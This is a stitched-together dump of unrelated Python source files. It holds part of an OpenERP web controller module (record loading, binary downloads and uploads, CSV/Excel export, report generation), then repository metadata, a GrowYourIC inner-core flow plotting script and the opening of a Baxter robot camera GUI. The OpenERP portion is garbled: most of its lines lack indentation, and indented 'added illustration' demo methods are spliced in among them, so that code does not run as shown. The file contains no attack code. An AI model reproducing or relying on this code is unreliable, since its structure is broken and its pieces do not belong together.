return {
'length': length,
'records': [{'id': id} for id in ids]
}
records = Model.read(ids, fields or False, req.context)
index = dict((r['id'], r) for r in records)
records = [index[x] for x in ids if x in index]
return {
'length': length,
'records': records
}
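    @staticmethod
    def _demo_preserve_search_order():
        # Hedged sketch (added illustration): read() may return records in
        # any order, so do_search_read() above rebuilds the result list in
        # the id order that search() produced. Values are hypothetical.
        ids = [7, 3, 5]
        records = [{'id': 3}, {'id': 5}, {'id': 7}]
        index = dict((r['id'], r) for r in records)
        return [index[x] for x in ids if x in index]
        # -> [{'id': 7}, {'id': 3}, {'id': 5}]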
@openerpweb.jsonrequest
def load(self, req, model, id, fields):
m = req.session.model(model)
value = {}
r = m.read([id], False, req.context)
if r:
value = r[0]
return {'value': value}
def call_common(self, req, model, method, args, domain_id=None, context_id=None):
return self._call_kw(req, model, method, args, {})
def _call_kw(self, req, model, method, args, kwargs):
# Temporary implements future display_name special field for model#read()
if method in ('read', 'search_read') and kwargs.get('context', {}).get('future_display_name'):
if 'display_name' in args[1]:
if method == 'read':
names = dict(req.session.model(model).name_get(args[0], **kwargs))
else:
names = dict(req.session.model(model).name_search('', args[0], **kwargs))
args[1].remove('display_name')
records = getattr(req.session.model(model), method)(*args, **kwargs)
for record in records:
record['display_name'] = \
names.get(record['id']) or "%s#%d" % (model, (record['id']))
return records
return getattr(req.session.model(model), method)(*args, **kwargs)
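    @staticmethod
    def _demo_display_name_fallback():
        # Hedged sketch (added illustration) of the fallback in _call_kw()
        # above: ids missing from name_get() get a synthetic "model#id"
        # display_name. The model name and values are hypothetical.
        model = 'res.partner'
        names = {1: 'Agrolait'}
        records = [{'id': 1}, {'id': 2}]
        for record in records:
            record['display_name'] = \
                names.get(record['id']) or "%s#%d" % (model, record['id'])
        return records
        # -> [{'id': 1, 'display_name': 'Agrolait'},
        #     {'id': 2, 'display_name': 'res.partner#2'}]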
@openerpweb.jsonrequest
def call(self, req, model, method, args, domain_id=None, context_id=None):
return self._call_kw(req, model, method, args, {})
@openerpweb.jsonrequest
def call_kw(self, req, model, method, args, kwargs):
return self._call_kw(req, model, method, args, kwargs)
@openerpweb.jsonrequest
def call_button(self, req, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(req, model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(req, action)
return False
@openerpweb.jsonrequest
def exec_workflow(self, req, model, id, signal):
return req.session.exec_workflow(model, id, signal)
@openerpweb.jsonrequest
def resequence(self, req, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
The re-sequencing starts at the first model of ``ids``, the sequence
number is incremented by one after each record and starts at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = req.session.model(model)
if not m.fields_get([field]):
return False
        # enumerate() has no start parameter before python 2.6
for i, id in enumerate(ids):
m.write(id, { field: i + offset })
return True
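    @staticmethod
    def _demo_resequence_numbers():
        # Hedged sketch (added illustration): resequence() above writes
        # offset, offset + 1, ... onto the given ids in list order.
        ids, offset = [42, 17, 99], 10
        return [(record_id, i + offset) for i, record_id in enumerate(ids)]
        # -> [(42, 10), (17, 11), (99, 12)]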
class View(openerpweb.Controller):
_cp_path = "/web/view"
@openerpweb.jsonrequest
def add_custom(self, req, view_id, arch):
CustomView = req.session.model('ir.ui.view.custom')
CustomView.create({
'user_id': req.session._uid,
'ref_id': view_id,
'arch': arch
}, req.context)
return {'result': True}
@openerpweb.jsonrequest
def undo_custom(self, req, view_id, reset=False):
CustomView = req.session.model('ir.ui.view.custom')
vcustom = CustomView.search([('user_id', '=', req.session._uid), ('ref_id' ,'=', view_id)],
0, False, False, req.context)
if vcustom:
if reset:
CustomView.unlink(vcustom, req.context)
else:
CustomView.unlink([vcustom[0]], req.context)
return {'result': True}
return {'result': False}
class TreeView(View):
_cp_path = "/web/treeview"
@openerpweb.jsonrequest
def action(self, req, model, id):
        return load_actions_from_ir_values(
            req, 'action', 'tree_but_open', [(model, id)], False)
class Binary(openerpweb.Controller):
_cp_path = "/web/binary"
@openerpweb.httprequest
def image(self, req, model, id, field, **kw):
last_update = '__last_update'
Model = req.session.model(model)
headers = [('Content-Type', 'image/png')]
etag = req.httprequest.headers.get('If-None-Match')
hashed_session = hashlib.md5(req.session_id).hexdigest()
id = None if not id else simplejson.loads(id)
if type(id) is list:
id = id[0] # m2o
if etag:
if not id and hashed_session == etag:
return werkzeug.wrappers.Response(status=304)
else:
date = Model.read([id], [last_update], req.context)[0].get(last_update)
if hashlib.md5(date).hexdigest() == etag:
return werkzeug.wrappers.Response(status=304)
retag = hashed_session
try:
if not id:
res = Model.default_get([field], req.context).get(field)
image_base64 = res
else:
res = Model.read([id], [last_update, field], req.context)[0]
retag = hashlib.md5(res.get(last_update)).hexdigest()
image_base64 = res.get(field)
if kw.get('resize'):
resize = kw.get('resize').split(',')
if len(resize) == 2 and int(resize[0]) and int(resize[1]):
width = int(resize[0])
height = int(resize[1])
# resize maximum 500*500
if width > 500: width = 500
if height > 500: height = 500
image_base64 = openerp.tools.image_resize_image(base64_source=image_base64, size=(width, height), encoding='base64', filetype='PNG')
image_data = base64.b64decode(image_base64)
except (TypeError, xmlrpclib.Fault):
image_data = self.placeholder(req)
headers.append(('ETag', retag))
headers.append(('Content-Length', len(image_data)))
try:
ncache = int(kw.get('cache'))
headers.append(('Cache-Control', 'no-cache' if ncache == 0 else 'max-age=%s' % (ncache)))
        except (TypeError, ValueError):
            # absent or non-numeric cache parameter: send no Cache-Control
            pass
return req.make_response(image_data, headers)
def placeholder(self, req, image='placeholder.png'):
addons_path = openerpweb.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
@openerpweb.httprequest
def saveas(self, req, model, field, id=None, filename_field=None, **kw):
""" Download link for files stored as binary fields.
If the ``id`` parameter is omitted, fetches the default value for the
binary field (via ``default_get``), otherwise fetches the field for
that precise record.
:param req: OpenERP request
:type req: :class:`web.common.http.HttpRequest`
:param str model: name of the model to fetch the binary from
:param str field: binary field
:param str id: id of the record from which to fetch the binary
:param str filename_field: field holding the file's name, if any
:returns: :class:`werkzeug.wrappers.Response`
"""
Model = req.session.model(model)
fields = [field]
content_type = 'application/octet-stream'
if filename_field:
fields.append(filename_field)
if id:
fields.append('file_type')
res = Model.read([int(id)], fields, req.context)[0]
if res.get('file_type'):
content_type = res['file_type']
else:
res = Model.default_get(fields, req.context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
return req.not_found()
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return req.make_response(
filecontent, [('Content-Type', content_type),
('Content-Disposition',
content_disposition(filename, req))])
@openerpweb.httprequest
def saveas_ajax(self, req, data, token):
jdata = simplejson.loads(data)
model = jdata['model']
field = jdata['field']
data = jdata['data']
id = jdata.get('id', None)
filename_field = jdata.get('filename_field', None)
context = jdata.get('context', {})
content_type = 'application/octet-stream'
Model = req.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if data:
res = {field: data, filename_field: jdata.get('filename', None)}
elif id:
fields.append('file_type')
res = Model.read([int(id)], fields, context)[0]
if res.get('file_type'):
content_type = res['file_type']
else:
res = Model.default_get(fields, context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
raise ValueError(_("No content found for field '%s' on '%s:%s'") %
(field, model, id))
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return req.make_response(
filecontent, headers=[('Content-Type', content_type),
('Content-Disposition',
content_disposition(filename, req))],
cookies={'fileToken': token})
@openerpweb.httprequest
def upload(self, req, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
except Exception, e:
args = [False, e.message]
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@openerpweb.httprequest
def upload_attachment(self, req, callback, model, id, ufile):
Model = req.session.model('ir.attachment')
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
attachment_id = Model.create({
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': model,
'res_id': int(id)
}, req.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
except xmlrpclib.Fault, e:
args = {'error':e.faultCode }
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@openerpweb.httprequest
def company_logo(self, req, dbname=None):
# TODO add etag, refactor to use /image code for etag
uid = None
if req.session._db:
dbname = req.session._db
uid = req.session._uid
elif dbname is None:
dbname = db_monodb(req)
if not uid:
uid = openerp.SUPERUSER_ID
if not dbname:
image_data = self.placeholder(req, 'logo.png')
else:
try:
# create an empty registry
registry = openerp.modules.registry.Registry(dbname)
with registry.cursor() as cr:
cr.execute("""SELECT c.logo_web
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_data = str(row[0]).decode('base64')
else:
image_data = self.placeholder(req, 'nologo.png')
except Exception:
image_data = self.placeholder(req, 'logo.png')
headers = [
('Content-Type', 'image/png'),
('Content-Length', len(image_data)),
]
return req.make_response(image_data, headers)
class Action(openerpweb.Controller):
_cp_path = "/web/action"
@openerpweb.jsonrequest
def load(self, req, action_id, do_not_eval=False):
Actions = req.session.model('ir.actions.actions')
value = False
try:
action_id = int(action_id)
except ValueError:
try:
module, xmlid = action_id.split('.', 1)
model, action_id = req.session.model('ir.model.data').get_object_reference(module, xmlid)
assert model.startswith('ir.actions.')
except Exception:
action_id = 0 # force failed read
base_action = Actions.read([action_id], ['type'], req.context)
if base_action:
ctx = {}
action_type = base_action[0]['type']
if action_type == 'ir.actions.report.xml':
ctx.update({'bin_size': True})
ctx.update(req.context)
action = req.session.model(action_type).read([action_id], False, ctx)
if action:
value = clean_action(req, action[0])
return value
@openerpweb.jsonrequest
def run(self, req, action_id):
return_action = req.session.model('ir.actions.server').run(
[action_id], req.context)
if return_action:
return clean_action(req, return_action)
else:
return False
class Export(openerpweb.Controller):
_cp_path = "/web/export"
@openerpweb.jsonrequest
def formats(self, req):
""" Returns all valid export formats
        :returns: for each export format, a mapping with its identifier
                  (``tag``) and printable name (``label``)
        :rtype: [dict]
"""
return sorted([
controller.fmt
for path, controller in openerpweb.controllers_path.iteritems()
if path.startswith(self._cp_path)
if hasattr(controller, 'fmt')
], key=operator.itemgetter("label"))
def fields_get(self, req, model):
Model = req.session.model(model)
fields = Model.fields_get(False, req.context)
return fields
@openerpweb.jsonrequest
def get_fields(self, req, model, prefix='', parent_name= '',
import_compat=True, parent_field_type=None,
exclude=None):
if import_compat and parent_field_type == "many2one":
fields = {}
else:
fields = self.fields_get(req, model)
if import_compat:
fields.pop('id', None)
else:
fields['.id'] = fields.pop('id', {'string': 'ID'})
fields_sequence = sorted(fields.iteritems(),
key=lambda field: openerp.tools.ustr(field[1].get('string', '')))
records = []
for field_name, field in fields_sequence:
if import_compat:
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
            id = prefix + (prefix and '/' or '') + field_name
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(name.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name}
if not import_compat or field['type'] == 'one2many':
# m2m field in import_compat is childless
record['children'] = True
return records
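    @staticmethod
    def _demo_readonly_exportability():
        # Hedged sketch (added illustration) of the states check in
        # get_fields() above: a readonly field stays exportable if at
        # least one of its states unsets readonly. The field definition
        # below is hypothetical.
        field = {'readonly': True,
                 'states': {'draft': [('readonly', False)]}}
        skipped = all(dict(attrs).get('readonly', True)
                      for attrs in field.get('states', {}).values())
        return skipped  # -> False: the 'draft' state re-enables the field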
@openerpweb.jsonrequest
def namelist(self,req, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = req.session.model("ir.exports").read([export_id])[0]
export_fields_list = req.session.model("ir.exports.line").read(
export['export_fields'])
fields_data = self.fields_info(
req, model, map(operator.itemgetter('name'), export_fields_list))
return [
{'name': field['name'], 'label': fields_data[field['name']]}
for field in export_fields_list
]
def fields_info(self, req, model, export_fields):
info = {}
fields = self.fields_get(req, model)
if ".id" in export_fields:
fields['.id'] = fields.pop('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
        # * then, group on: the first field of the path (which is the same
        #   for a field and for its subfields) and the length of splitting
        #   on the first '/', which basically means grouping the field on
        #   one side and
# all of the subfields on the other. This way, we have the field (for
# the xmlid) with length 1, and all of the subfields with the same
# base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
req, fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, req, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(req, model, export_fields).iteritems())
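def _demo_group_export_fields():
    # Hedged sketch (added illustration, not called by the addon): how the
    # sorted() + itertools.groupby() pass in fields_info() above buckets
    # export paths. The field names are hypothetical.
    export_fields = ['name', 'partner_id/id', 'partner_id/name']
    return [
        ((base, length), list(subfields))
        for (base, length), subfields in itertools.groupby(
            sorted(export_fields),
            lambda field: (field.split('/', 1)[0], len(field.split('/', 1))))
    ]
    # -> [(('name', 1), ['name']),
    #     (('partner_id', 2), ['partner_id/id', 'partner_id/name'])]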
class ExportFormat(object):
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
        provided base name (extension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from OpenERP's export data to whatever the
current export class outputs
        :param list fields: a list of fields to export
        :param list rows: a list of records to export
        :returns: the serialized content of the export file
        :rtype: bytes
"""
raise NotImplementedError()
@openerpweb.httprequest
def index(self, req, data, token):
params = simplejson.loads(data)
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain',
'import_compat')(
params)
Model = req.session.model(model)
context = dict(req.context or {}, **params.get('context', {}))
ids = ids or Model.search(domain, 0, False, False, context)
field_names = map(operator.itemgetter('name'), fields)
import_data = Model.export_data(ids, field_names, context).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return req.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model), req)),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
_cp_path = '/web/export/csv'
fmt = {'tag': 'csv', 'label': 'CSV'}
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = StringIO()
writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
writer.writerow([name.encode('utf-8') for name in fields])
for data in rows:
row = []
for d in data:
if isinstance(d, basestring):
d = d.replace('\n',' ').replace('\t',' ')
try:
d = d.encode('utf-8')
except UnicodeError:
pass
if d is False: d = None
row.append(d)
writer.writerow(row)
fp.seek(0)
data = fp.read()
fp.close()
return data
class ExcelExport(ExportFormat, http.Controller):
_cp_path = '/web/export/xls'
fmt = {
'tag': 'xls',
'label': 'Excel',
'error': None if xlwt else "XLWT required"
}
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
style = xlwt.easyxf('align: wrap yes')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
if isinstance(cell_value, basestring):
cell_value = re.sub("\r", " ", cell_value)
if cell_value is False: cell_value = None
worksheet.write(row_index + 1, cell_index, cell_value, style)
fp = StringIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
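# Hedged sketch (added illustration): the minimal surface a new export
# backend needs -- subclass ExportFormat, provide content_type, filename()
# and from_data(), and expose it under a _cp_path like the CSV/Excel
# controllers above. The TSV format here is a made-up example and is left
# unregistered (no _cp_path) on purpose.
class _DemoTSVExport(ExportFormat):
    @property
    def content_type(self):
        return 'text/tab-separated-values;charset=utf8'
    def filename(self, base):
        return base + '.tsv'
    def from_data(self, fields, rows):
        lines = ['\t'.join(fields)]
        for row in rows:
            lines.append('\t'.join(
                u'' if cell is False else unicode(cell) for cell in row))
        return u'\n'.join(lines).encode('utf-8')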
class Reports(openerpweb.Controller):
_cp_path = "/web/report"
POLLING_DELAY = 0.25
TYPES_MAPPING = {
'doc': 'application/vnd.ms-word',
'html': 'text/html',
'odt': 'application/vnd.oasis.opendocument.text',
'pdf': 'application/pdf',
'sxw': 'application/vnd.sun.xml.writer',
'xls': 'application/vnd.ms-excel',
}
@openerpweb.httprequest
def index(self, req, action, token):
action = simplejson.loads(action)
report_srv = req.session.proxy("report")
context = dict(req.context)
context.update(action["context"])
report_data = {}
report_ids = context["active_ids"]
if 'report_type' in action:
report_data['report_type'] = action['report_type']
if 'datas' in action:
if 'ids' in action['datas']:
report_ids = action['datas'].pop('ids')
report_data.update(action['datas'])
report_id = report_srv.report(
req.session._db, req.session._uid, req.session._password,
action["report_name"], report_ids,
report_data, context)
report_struct = None
while True:
report_struct = report_srv.report_get(
req.session._db, req.session._uid, req.session._password, report_id)
if report_struct["state"]:
break
time.sleep(self.POLLING_DELAY)
report = base64.b64decode(report_struct['result'])
if report_struct.get('code') == 'zlib':
report = zlib.decompress(report)
report_mimetype = self.TYPES_MAPPING.get(
report_struct['format'], 'octet-stream')
file_name = action['report_name']
        # Try to get the current object model and its ids from the context
if 'context' in action:
action_context = action['context']
if (action_context.get('active_model')
and action_context['active_ids']):
# Use built-in ORM method to get data from DB
m = req.session.model(action_context['active_model'])
r = []
try:
r = m.name_get(action_context['active_ids'], context)
except xmlrpclib.Fault:
                    # we assume this went wrong because of an incorrect or
                    # missing _rec_name. We don't have access to _columns
                    # here to do a proper check
pass
# Parse result to create a better filename
item_names = [item[1] or str(item[0]) for item in r]
if action.get('name'):
item_names.insert(0, action['name'])
if item_names:
file_name = '-'.join(item_names)[:251]
file_name = '%s.%s' % (file_name, report_struct['format'])
# Create safe filename
p = re.compile('[/:(")<>|?*]|(\\\)')
file_name = p.sub('_', file_name)
return req.make_response(report,
headers=[
('Content-Disposition', content_disposition(file_name, req)),
('Content-Type', report_mimetype),
('Content-Length', len(report))],
cookies={'fileToken': token})
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
MarineLasbleis/GrowYourIC
|
notebooks/Yoshida.py
|
1
|
4212
|
# -*- coding: UTF-8 -*-
import numpy as np
import matplotlib.pyplot as plt #for figures
#from mpl_toolkits.basemap import Basemap #to render maps
import math
from GrowYourIC import tracers, positions, geodyn, geodyn_trg, geodyn_static, plot_data, data, geodyn_analytical_flows
#plt.rcParams['figure.figsize'] = (8.0, 3.0) #size of figures
cm = plt.cm.get_cmap('viridis_r')
#V = 0.2 # translation velocity
#S2 = 1/5.
#Yoshida = geodyn_analytical_flows.Yoshida96(V, S=S2)
#file = "Fig/Yoshida_{}_S2_{}".format(V, S2)
#print(file)
V = [0.2, 0.4]
S2 = [1/5., 4/5., 2.]
for vitesse in V:
for value_S in S2:
Yoshida = geodyn_analytical_flows.Yoshida96(vitesse, S=value_S)
file = "Fig/Yoshida_{}_S2_{}".format(vitesse, value_S)
print(file)
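        # hedged note (added comment): the two loops above sweep 2
        # velocities x 3 shear amplitudes = 6 cases; e.g. vitesse=0.2,
        # value_S=1/5. gives the output prefix "Fig/Yoshida_0.2_S2_0.2"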
npoints = 50 #number of points in the x direction for the data set.
data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
data_set.method = "bt_point"
# Age plot with velocity field
proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
data_set.plot_c_vec(Yoshida, proxy=proxy, nameproxy="age")
plt.savefig(file+"_age.pdf")
# accumulated deformation
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
#plt.savefig(file+"_vM_acc.pdf")
#data_set.plot_c_vec(Yoshida, proxy=np.log10(proxy), cm=cm, nameproxy="log_vMises_acc")
#plt.savefig(file+"_log_vM_acc.pdf")
# tracers with age
#tracers.Swarm(5, Yoshida, Yoshida.tau_ic/400, "ici", plane="meridional")
#data_set = data.PerfectSamplingCut(20, rICB = 1.)
#data_set.method = "bt_point"
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, nameproxy="age")
#plt.show()
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
#Karato = geodyn_analytical_flows.Model_LorentzForce()
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#Karato.P = 1e-4
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#proxy = geodyn.evaluate_proxy(data_set, Karato, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy, cm=cm, nameproxy="age")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="age")
#plt.savefig(file+"_tage.pdf")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_tau_ic")
#plt.savefig(file+"_t_vM.pdf")
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_cart", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_cart")
#plt.savefig("Yoshida_vM.pdf")
#Karato.P = 1e4
#proxy_1 = geodyn.evaluate_proxy(data_set, Karato, proxy_type="vMises_tau_ic", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy_1, cm=cm, nameproxy="vMises_tau_ic")
#npoints = 50 #number of points in the x direction for the data set.
#data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
#data_set.method = "bt_point"
#proxy_2 = geodyn.evaluate_proxy(data_set, Karato, proxy_type="age", verbose = False)
#data_set.plot_c_vec(Karato, proxy=proxy_2, cm=cm, nameproxy="age")
#npoints = 100 #number of points in the x direction for the data set.
#data_set = data.PerfectSamplingCut(npoints, rICB = 1.)
#data_set.method = "bt_point"
#proxy = geodyn.evaluate_proxy(data_set, Yoshida, proxy_type="vMises_acc", verbose = False)
#data_set.plot_c_vec(Yoshida, proxy=proxy, cm=cm, nameproxy="vMises_acc")
plt.show()
|
mit
|
UCRoboticsLab/BaxterTictactoe
|
src/baxter_tictactoe/scripts/camera_gui.py
|
1
|
15093
|
#!/usr/bin/env python
"""
A GUI to help user take snapshot with hand camera
"""
import rospy
import struct
import Tkinter as tk
import tkFileDialog, tkMessageBox
import tkSimpleDialog
from baxter_interface.camera import CameraController
from PIL import Image
from PIL import ImageTk, ImageDraw
import numpy as np
import glob
import os
import subprocess
import Queue
from sensor_msgs.msg import Image as ImageMsg
import threading
from cv_bridge import CvBridge, CvBridgeError
from Tkconstants import RIDGE
import copy
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from baxter_core_msgs.srv import (
SolvePositionIK,
SolvePositionIKRequest,
)
from std_msgs.msg import Header
from baxter_interface import Limb
class StatusBar(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.label = tk.Label(self, bd=1, relief=tk.SUNKEN, anchor=tk.W)
self.label.pack(fill="x", anchor="w")
self.prompt1 = " Saving snapshot files to: "
        self.prompt2 = "\n Saving snapshot file as: "
self.update()
def update(self):
global path, prefix
self.label.config(text=self.prompt1 + path + self.prompt2 + prefix + "_xx", justify="left")
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class MainWin(object):
"""
represent the main window of the application
"""
global path, prefix
def __init__(self, parent):
self.camera = Cam()
self.bridge = CvBridge() # the open cv bridge
self.animation_node = None # no animation server at beginning
self.max_screen_res = (1024, 600)
#============================== frames =========================================
self.frameA = tk.Frame(parent, highlightbackground="green", highlightcolor="green", highlightthickness=2)
self.frameA.pack(anchor=tk.W, padx = 10, pady = 10)
self.frameB = tk.Frame(parent)
self.frameB.pack(side=tk.BOTTOM, padx = 10, pady = 10)
self.stbar = StatusBar(parent)
self.stbar.pack(side="bottom", fill='x')
#============================= panels ==========================================
self.res_mode = 2
data = np.zeros((400, 640, 3), dtype=np.uint8)
#data = np.zeros(self.camera.cam_proxy.resolution + (3,), dtype=np.uint8)
self.imageA = Image.fromarray(data, 'RGB')
self.imageATk = ImageTk.PhotoImage(self.imageA)
self.panelA = tk.Label(self.frameA, image=self.imageATk, relief=RIDGE, borderwidth = 3)
self.panelA.pack(side=tk.LEFT, padx = 10, pady = 10)
self.imageB = Image.fromarray(data, 'RGB')
self.draw_box()
self.imageB_cv = np.array(self.imageB)
self.imageBTk = ImageTk.PhotoImage(self.imageB)
self.panelB = tk.Label(self.frameA, image=self.imageBTk, relief=RIDGE, borderwidth = 3)
self.panelB.pack(side=tk.LEFT, padx = 10, pady = 10)
#============================= Buttons =====================================
path_btn = tk.Button(self.frameB, text="Select a path", command=self.select_path, width=20)
path_btn.grid(row=0, column=0,padx=10, pady=10)
prefix_btn = tk.Button(self.frameB, text="Select a prefix", command=self.select_prefix, width=20)
prefix_btn.grid(row=1, column=0,padx=10, pady=10)
moveArm_btn = tk.Button(self.frameB, text="Move arm to position", command=self.move_arm, width=20)
moveArm_btn.grid(row=0, column=1,padx=10, pady=10)
snapshot_btn = tk.Button(self.frameB, text="Snapshot", command=self.snapshot, width=20)
snapshot_btn.grid(row=1, column=1,padx=10, pady=10)
restart_btn = tk.Button(self.frameB, text="Restart anime", command=self.restart_node, width=20)
restart_btn.grid(row=1, column=2,padx=10, pady=10)
selfie_btn = tk.Button(self.frameB, text="Selfie pose", command=self.move_to_selfie, width=20)
selfie_btn.grid(row=0, column=2,padx=10, pady=10)
up_btn = tk.Button(self.frameB, text="up", command=self.move_up, width=3)
up_btn.grid(row=0, column=5,padx=10, pady=10)
down_btn = tk.Button(self.frameB, text="down", command=self.move_down, width=3)
down_btn.grid(row=1, column=5,padx=10, pady=10)
def relative_move(self, x, y, z):
'''
        move arm relative to the current pose
:param x: relative displacement in x
:param y: relative displacement in y
:param z: relative displacement in z
'''
global limb
cur_pose = limb.endpoint_pose()
cur_pose_dict = Pose(position=Point(cur_pose["position"][0] + x,
cur_pose["position"][1] + y,
cur_pose["position"][2] + z,),
orientation=cur_pose['orientation'])
joint_angles = self.get_joint_position("left", cur_pose_dict)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.018)
def move_up(self):
'''
move arm up a bit
'''
self.relative_move(x=0, y=0, z=0.03)
def move_down(self):
'''
move arm down a bit
'''
self.relative_move(x=0, y=0, z=-0.03)
def move_to_selfie(self):
'''
move to selfie pose
'''
global selfie_pose, limb
joint_angles = self.get_joint_position("left", selfie_pose)
if joint_angles is None:
return
limb.move_to_joint_positions(joint_angles, timeout=5, threshold=0.0018)
def draw_box(self):
# calculate bounding box pixel size in window display
rect_w, rect_h = tuple(n * pow(0.75, 2) for n in self.max_screen_res)
ori_x = (640 - rect_w)//2
